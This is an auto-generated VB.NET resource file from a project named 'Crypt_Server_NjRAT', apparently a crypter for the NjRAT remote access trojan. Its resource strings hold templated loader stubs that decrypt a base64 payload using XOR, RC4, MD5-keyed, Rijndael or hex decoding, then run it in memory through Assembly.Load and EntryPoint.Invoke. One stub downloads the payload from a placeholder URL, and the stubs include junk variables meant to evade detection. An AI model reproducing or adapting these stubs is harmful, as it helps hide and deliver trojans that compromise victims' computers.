'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Crypt_Server_NjRAT.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Security.Cryptography
        '''Imports System.Text
        '''
        '''Module omar_iraq
        '''
        '''
        '''    Sub main()
        '''
        '''        Dim %1% As String = &quot;%2%&quot;
        '''
        '''
        '''
        '''
        '''        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), &quot;%8%&quot;)
        '''
        '''
        '''
        '''
        '''
        '''        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''
        '''
        '''    End Sub
        '''   Public Function %5%(ByVal BB As Byte(), ByVal CC As String) As Byte()
        '''        Dim AA As Byte() = System.Text.Encoding.ASCII.GetByte [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property _xor() As String
            Get
                Return ResourceManager.GetString("_xor", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Security.Cryptography
        '''Imports System.Text
        '''Imports System.IO
        '''
        '''Module %1%
        '''
        '''
        '''    Sub main()
        '''
        '''        Dim %2% As New Net.WebClient()
        '''		   Try
        '''
        '''
        '''        Catch ex As Exception
        '''            Dim kdfjkjf As Double = 985786857867
        '''            Dim lofdfdf As String = &quot;sdo;ifj;slkdjf;skjdfjksd;fkj&quot;
        '''            Dim hhhhhh As String = &quot;asdfasdfkj;lkjfdkjsd;fkjfd&quot;
        '''
        '''        End Try
        '''
        '''
        '''        Dim %3% As String = %2%.DownloadString(&quot;%100%&quot;)
        '''
        '''
        '''
        '''        Dim %4% As Byte() = Convert.FromBase [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property dwonloder() As String
            Get
                Return ResourceManager.GetString("dwonloder", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Module %1%
        '''
        '''    Dim %2% As String
        '''    Dim %3% As Byte()
        '''	    Sub main()
        '''
        '''	 
        '''        %3% = %5%(%2%)
        '''
        '''
        '''        Dim %4% As Object = Reflection.Assembly.Load(%3%)
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''				
        '''    End Sub
        '''
        '''    Function %5%(ByVal %8% As String) As Byte()
        '''        Dim %6%
        '''        Dim %7%() As Byte
        '''        %8% = Replace(%8%, &quot; &quot;, &quot;&quot;)
        '''        ReDim %7%((Len(%8%) \ 2) - 1)
        '''        For %6% = 0 To UBound(%7%) - 2
        '''            %7%(%6%) = CLng(&quot;&amp;H&quot; &amp; Mid$(%8%, 2 * %6% + 1, 2))
        ''' [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property HEXENTRYBOINT() As String
            Get
                Return ResourceManager.GetString("HEXENTRYBOINT", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Security.Cryptography
        '''Imports System.Text
        '''
        '''Module omar_iraq
        '''
        '''    Sub main()
        '''
        '''        Dim %1% As String = &quot;%2%&quot;
        '''
        '''
        '''
        '''
        '''        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), &quot;%6%&quot;)
        '''
        '''
        '''
        '''
        '''
        '''        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''
        '''
        '''    End Sub
        '''    Public Function %5%(ByVal bytData() As Byte, _
        '''        ByVal sKey As String, _
        '''          Optional ByVal tMode As CipherMode = Ciphe [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property MD5() As String
            Get
                Return ResourceManager.GetString("MD5", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Security.Cryptography
        '''Imports System.Text
        '''
        '''Module omar_iraq
        '''
        '''    Sub main()
        '''
        '''        Dim %1% As String = &quot;%2%&quot;
        '''
        '''
        '''
        '''
        '''        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), &quot;%8%&quot;)
        '''
        '''
        '''
        '''
        '''
        '''        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''
        '''
        '''    End Sub
        '''    Public Function %5%(ByVal bytData() As Byte, ByVal sKey As String, Optional ByVal tMode As CipherMode = CipherMode.ECB, Optional ByVa [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property MD51() As String
            Get
                Return ResourceManager.GetString("MD51", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Imports System.Security.Cryptography
        '''Imports System.Text
        '''
        '''Module omar_iraq
        '''
        '''
        '''    Sub main()
        '''
        '''        Dim %1% As String = &quot;%2%&quot;
        '''
        '''
        '''
        '''
        '''        Dim %3% As Byte() = %5%(Convert.FromBase64String(%1%), &quot;%8%&quot;)
        '''
        '''
        '''
        '''
        '''
        '''        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3%)
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''
        '''
        '''    End Sub
        '''    Public Function %5%(ByVal D1 As Byte(), ByVal D2 As String) As Byte()
        '''        Dim D3 As Byte() = System.Text.Encoding.ASCII.GetByt [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RC4() As String
            Get
                Return ResourceManager.GetString("RC4", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to     Imports System.Security.Cryptography
        '''
        '''Module omar_iraq
        '''	Sub main()
        '''	    
        '''        Dim %1% As String = &quot;%2%&quot;
        '''        Dim %3% As Byte() = Convert.FromBase64String(%6%(%1% , &quot;%8%&quot;))
        '''
        '''
        '''
        '''        Dim %4% As System.Reflection.Assembly = System.Reflection.Assembly.Load(%3% )
        '''        %4%.EntryPoint.Invoke(Nothing, Nothing)
        '''
        '''
        '''    End Sub
        '''    Public Function %6%(ByVal UDecryptU As String, ByVal UKeyU As String)
        '''        Dim %7% As New RijndaelManaged
        '''        Dim XbtCipherX() As Byte
        '''        Dim Xbt [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property RijndaelDecrypt() As String
            Get
                Return ResourceManager.GetString("RijndaelDecrypt", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
